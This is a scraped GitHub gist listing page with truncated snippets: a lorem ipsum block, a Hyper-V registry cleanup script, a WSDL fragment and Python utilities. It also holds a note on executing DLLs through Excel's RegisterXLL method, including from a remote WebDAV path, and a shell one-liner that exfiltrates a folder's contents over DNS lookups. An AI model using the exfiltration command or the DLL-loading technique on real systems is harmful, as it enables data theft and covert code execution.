Skip to content

Instantly share code, notes, and snippets.

View gist:53d5ddd66d471908300f11094a5abc44
The standard Lorem Ipsum passage, used since the 1500s
"Lorem ipsum dolor sit amet, consectetur adipiscing elit,
sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.
Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris
nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in
reprehenderit in voluptate velit esse cillum dolore eu fugiat
nulla pariatur. Excepteur sint occaecat cupidatat non proident,
sunt in culpa qui officia deserunt mollit anim id est laborum. 378492kasd5932fajkl124908pp "
trolldbois / clean-hyperV-ghost-netadapters.ps1
Created September 3, 2020 14:26
Powershell to cleanup the ghost virtual NetAdapters created for HyperV
View clean-hyperV-ghost-netadapters.ps1
$adapterName = "Hyper-V Virtual Ethernet Adapter"
$badAdapters = Get-NetAdapter | ? {$_.InterfaceDescription.StartsWith($adapterName) -and $_.Status -ne "Up"}
$badAdaptersName = $badAdapters | select -ExpandProperty InterfaceDescription
$badGUID = Get-WmiObject win32_networkadapter -Property guid,Name | ? {$badAdaptersName.Contains($_.Name)} | select -ExpandProperty GUID
foreach ($GUID in $badGUID) {
Write-Host "Removing $GUID" -ForegroundColor Cyan
$RemoveKey = "HKLM:\SYSTEM\ControlSet001\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\$GUID"
# Get-Item $RemoveKey | GCI
Remove-Item -Recurse $RemoveKey
View algosec.wsdl
<?xml version="1.0" encoding="UTF-8"?>
<definitions xmlns:tns="" xmlns:soap="" xmlns:xsd="" xmlns:soapenc="" xmlns:wsdl="" xmlns="" name="FirewallAnalyzerWebService" targetNamespace="">
<!-- TYPES -->
<xsd:schema xmlns:tns="" xmlns:xsd="" version="1.0" targetNamespace="">
<xsd:import namespace=""/>
<!-- Groups -->
<xsd:complexType name="Groups">
<xsd:element name="GroupsID" type="xsd:string" minOccurs="0" maxOccurs="unbounded" />
View gist:af7fee01b1afa13a74c196fefceeda93
import ctypeslib
from ctypeslib.codegen import clangparser
from ctypeslib.codegen import codegenerator
def gen_python_bindings(outdir, path):
# TODO: Make it configurable
clang_opts = ["-I/usr/local/include/libr/", "-I/usr/local/include/"]
pyout = StringIO()
fname = os.path.splitext(os.path.basename(path))[0]
trolldbois /
Created August 2, 2017 23:39 — forked from nickjevershed/
Python script to convert Google spreadsheets to simple JSON file and save it locally. Assumes your data is on the left-most sheet, ie the default. Spreadsheet needs to be 'published to the web'.
import simplejson as json
import requests
#your spreadsheet key here. I'm using an example from the Victorian election campaign
key = "1THJ6MgfEk-1egiPFeDuvs4qEi02xTpz4fq9RtO7GijQ"
#google api request urls - I'm doing the first one just to get nice key values (there's probably a better way to do this)
url1 = "" + key + "/od6/public/values?alt=json"
trolldbois /
Created July 24, 2017 17:47 — forked from ryhanson/
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

trolldbois / gist:7797357
Created December 4, 2013 23:15
DNS exfiltration
View gist:7797357
View gist:7797246
# pass a domain (minus the tld) on cli to exclude from the output
require 'socket'
class UDPServer
def initialize(port)
trolldbois / gist:7797236
Created December 4, 2013 23:04
DNS exfiltration by Shell oneliner
View gist:7797236
(tar zcf - localfolder | xxd -p -c 16 | while read line; do host $; done)